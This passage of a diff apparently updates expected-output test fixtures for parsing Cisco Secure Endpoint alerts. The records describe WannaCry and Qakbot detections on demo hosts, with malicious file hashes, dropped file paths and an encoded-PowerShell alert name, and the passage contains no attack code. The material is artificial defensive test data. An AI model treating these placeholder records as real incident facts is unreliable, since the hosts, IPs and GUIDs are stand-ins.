System\",\"product_version\":\"10.0.14409.1005\"},\"sha1\":\"67858ead93feed62c0b1865369840e6e8086f53b\",\"sha256\":\"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334\",\"size\":425984,\"type_id\":1}]},\"remediated\":false,\"severity\":\"medium\",\"silent\":false,\"start_ts\":1610640884,\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"],\"type\":\"activity\",\"normalized\":{\"observables\":{\"file\":{\"name\":[\"powershell.exe\",\"wmiprvse.exe\"],\"path\":[\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\",\"c:\\\\windows\\\\system32\\\\wbem\"]}},\"name\":\"wmiprvse launched encoded powershell command\"},\"ts\":1610640884},\"tactics\":[\"TA0002\",\"TA0005\",\"TA0008\"]}}",
-                "id": "6880683125978957000",
-                "kind": "alert"
+                "code": "553648222",
+                "kind": "alert",
+                "action": "Threat Detection",
+                "id": "6880683125978957000"
             },
             "cisco": {
                 "secure_endpoint": {
@@ -2624,8 +2655,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139873940Z",
+                "ingested": "2021-09-30T00:15:10.798723167Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260893",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
                 "id": "6419247189909832000",
@@ -2699,8 +2731,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139875674Z",
+                "ingested": "2021-09-30T00:15:10.798725403Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260893",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
                 "id": "6419247189909832000",
@@ -2774,8 +2807,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139877427Z",
+                "ingested": "2021-09-30T00:15:10.798727650Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260893",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
                 "id": "6419247189909832000",
@@ -2849,8 +2883,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139879258Z",
+                "ingested": "2021-09-30T00:15:10.798730065Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260893",
                 "kind": "alert",
                 "action": "Retrospective Quarantine Attempt Failed",
                 "id": "6419247189909832000",
@@ -2930,8 +2965,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139881018Z",
+                "ingested": "2021-09-30T00:15:10.798732325Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831755\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6419247189909832000",
@@ -3009,8 +3045,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139882747Z",
+                "ingested": "2021-09-30T00:15:10.798734619Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831754\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6419247189909832000",
@@ -3088,8 +3125,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139884490Z",
+                "ingested": "2021-09-30T00:15:10.798736861Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":873000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831753\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"qeriuwjhrf\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\qeriuwjhrf\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6419247189909832000",
@@ -3167,8 +3205,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139886210Z",
+                "ingested": "2021-09-30T00:15:10.798739078Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":732000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6419247189909832000",
@@ -3246,8 +3285,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139887993Z",
+                "ingested": "2021-09-30T00:15:10.798741293Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6419247189909832000",
@@ -3325,8 +3365,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139889716Z",
+                "ingested": "2021-09-30T00:15:10.798743492Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6419247189909832000",
@@ -3404,8 +3445,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:41:58.139891442Z",
+                "ingested": "2021-09-30T00:15:10.798745729Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6419247189909832000",
@@ -3477,8 +3519,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139893184Z",
+                "ingested": "2021-09-30T00:15:10.798747986Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6412604589194871000",
@@ -3568,8 +3611,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139894909Z",
+                "ingested": "2021-09-30T00:15:10.798750224Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870787\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6412604589194871000",
@@ -3649,8 +3693,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139896645Z",
+                "ingested": "2021-09-30T00:15:10.798752439Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870786\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"\",\"file_path\":\"\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6412604589194871000",
@@ -3738,8 +3783,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139898403Z",
+                "ingested": "2021-09-30T00:15:10.798754652Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":479000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6412604589194870785\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6412604589194871000",
@@ -3811,8 +3857,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:41:58.139900121Z",
+                "ingested": "2021-09-30T00:15:10.798756900Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412604589194871000,\"timestamp\":1610637865,\"timestamp_nanoseconds\":994000000,\"date\":\"2021-01-14T15:24:25+00:00\",\"event_type\":\"Threat 